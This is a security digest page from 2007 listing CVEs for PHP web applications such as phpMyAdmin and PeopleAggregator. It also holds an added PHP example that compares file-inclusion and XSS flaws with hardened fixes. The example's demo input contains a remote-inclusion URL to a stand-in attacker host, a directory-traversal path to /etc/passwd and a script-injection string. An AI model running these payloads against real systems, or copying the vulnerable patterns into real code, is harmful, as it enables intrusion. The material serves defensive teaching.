Information Security


Daily digest of web application bugs (PHP, ASP, JSP, CGI, Perl)
Published: 12 November 2007
Source:
SecurityVulns ID: 8329
Type: remote
Severity: 5/10
Description: PHP inclusion, SQL injection, directory traversal, cross-site scripting, information leaks, etc.
Affected products: EGGBLOG : EggBlog 3.1
 PHPMYADMIN : phpMyAdmin 2.11
 PHPNUK : PHP-Nuke 8.1
 LISCRIPTS : LI-Guestbook 1.2
 PEOPLEAGGREGATOR : PeopleAggregator 1.2
CVE: CVE-2007-5631 (Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6 allow remote attackers to execute arbitrary PHP code via a URL in the current_blockmodule_path parameter to (1) AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2) ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3) MembersFacewallModule/MembersFacewallModule.php, (4) NewestGroupsModule/NewestGroupsModule.php, (5) UploadMediaModule/UploadMediaModule.php, and (6) VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and (7) the path_prefix parameter to several components.)
 CVE-2007-5589 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in libraries/; and certain input available in PHP_SELF and (2) PATH_INFO in libraries/common.inc.php. NOTE: there might also be other vectors related to (3) REQUEST_URI.)
 CVE-2007-5386 (Cross-site scripting (XSS) vulnerability in scripts/setup.php in phpMyAdmin 2.11.1, when accessed by a browser that does not URL-encode requests, allows remote attackers to inject arbitrary web script or HTML via the query string.)
 CVE-2007-3694
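The two bug classes behind CVE-2007-5631 (include path taken from a request parameter) and CVE-2007-5589 (PHP_SELF echoed into HTML), each as the vulnerable pattern next to a hardened replacement. This is an added example, not code from PeopleAggregator, phpMyAdmin or the advisories listed on this page: the module names come from the CVE-2007-5631 text, while the directory layout, request values and function names are constructed for illustration.

```php
<?php
// Added illustration, not code from PeopleAggregator, phpMyAdmin or the
// advisories above. Module names are taken from the CVE-2007-5631 text;
// the directory layout, request values and function names are constructed.
declare(strict_types=1);

// ---- CVE-2007-5631 class: file inclusion driven by a request parameter ----

// Vulnerable pattern: the include prefix is copied from the query string.
// With allow_url_include=On a value such as "http://evil.example/shell.txt?"
// makes include() fetch and execute attacker code; even with it off, "../"
// reaches local files. The path is returned, not passed to include(), so the
// demo stays harmless.
function vulnerableIncludePath(array $get): string
{
    $prefix = $get['current_blockmodule_path'] ?? '.';
    return $prefix . '/NewestGroupsModule/NewestGroupsModule.php';
}

// Hardened: the client picks a module *name* from a fixed allow-list; the path
// is built server-side and must resolve inside $baseDir.
const BLOCK_MODULES = [
    'AudiosMediaGalleryModule', 'ImagesMediaGalleryModule', 'MembersFacewallModule',
    'NewestGroupsModule', 'UploadMediaModule', 'VideosMediaGalleryModule',
];

function resolveModule(string $requested, string $baseDir): ?string
{
    if (!in_array($requested, BLOCK_MODULES, true)) {
        return null;                                   // unknown or URL-shaped name
    }
    $real     = realpath("$baseDir/$requested/$requested.php");
    $realBase = realpath($baseDir);
    if ($real === false || $realBase === false) {
        return null;                                   // module file missing
    }
    // realpath() has collapsed symlinks and "..": insist the result is still
    // below the module root before it is handed to include().
    $root = $realBase . DIRECTORY_SEPARATOR;
    return strncmp($real, $root, strlen($root)) === 0 ? $real : null;
}

// ---- CVE-2007-5589 class: reflected XSS through PHP_SELF / PATH_INFO ----

// Vulnerable pattern: PHP_SELF carries any PATH_INFO the client appended, so
// /server_status.php/"><script>alert(1)</script> lands inside the attribute.
function vulnerableFormTag(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// Hardened: SCRIPT_NAME is the script actually executed (no PATH_INFO), and it
// is HTML-encoded anyway so a hostile value cannot break out of the attribute.
function safeFormTag(array $server): string
{
    $action = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $action . '" method="post">';
}

// ---- Demo with constructed attacker input ----
$get    = ['current_blockmodule_path' => 'http://evil.example/shell.txt?'];
$server = [
    'PHP_SELF'    => '/server_status.php/"><script>alert(1)</script>',
    'SCRIPT_NAME' => '/server_status.php',
];

echo "vulnerable include target: ", vulnerableIncludePath($get), "\n";

// Throw-away module tree so realpath() has real files to resolve.
$base = sys_get_temp_dir() . '/betablock_' . bin2hex(random_bytes(4));
foreach (BLOCK_MODULES as $m) {
    mkdir("$base/$m", 0700, true);
    file_put_contents("$base/$m/$m.php", "<?php // $m stub\n");
}
foreach ([$get['current_blockmodule_path'], '../../etc/passwd', 'NewestGroupsModule'] as $name) {
    $resolved = resolveModule($name, $base);
    printf("%-32s -> %s\n", $name, $resolved === null ? 'REJECTED' : 'include ' . basename($resolved));
}
foreach (BLOCK_MODULES as $m) {            // remove the temporary tree again
    unlink("$base/$m/$m.php");
    rmdir("$base/$m");
}
rmdir($base);

echo "vulnerable: ", vulnerableFormTag($server), "\n";
echo "hardened:   ", safeFormTag($server), "\n";
```

Run it with `php example.php`. The allow-list is the actual fix for the inclusion class: a URL or a `../` sequence is never a valid module name, so it is rejected before any filesystem call, and the `realpath()` prefix check only guards against a misconfigured module root. For the XSS class, switching to `SCRIPT_NAME` removes the attacker-controlled PATH_INFO, and the `htmlspecialchars()` call is the general rule that applies to every server variable echoed into markup, `REQUEST_URI` included.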
Original text: phil_(at)_broadbandmechanics.com, PeopleAggregator security advisory - re CVE-2007-5631 (12.11.2007)
 Guns_(at)_0x90.com.ar, PHP-Nuke Module Advertising Blind SQL Injection (12.11.2007)
 mesut_(at)_h-labs.org, Eggblog v3.1.0 XSS Vulnerability (12.11.2007)
 Advisory_(at)_Aria-Security.net, Aria-Security.Net Research: Rapid Classified HotList Image (12.11.2007)
 Hanno Böck, [Full-disclosure] CVE-2007-3694: Cross site scripting (XSS) in broadcast machine (12.11.2007)
 drakomo_(at)_gmail.com, SQL injection bug found in TBSource. (12.11.2007)
 root_(at)_hanicker.it, xoops mylinks module - sql injection (12.11.2007)
 abc.seo_(at)_gmail.com, li-guestbook sql inj (12.11.2007)
 DEBIAN, [SECURITY] [DSA 1403-1] New phpmyadmin packages fix cross-site scripting (12.11.2007)
 Advisory_(at)_Aria-Security.net, Aria-Security.Net Research: Lotfian BROCHURE Management System (12.11.2007)
 MustLive, Vulnerability in PHP-Nuke captcha (12.11.2007)
Files: Exploits PHP-Nuke Module Advertising Blind SQL Injection

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod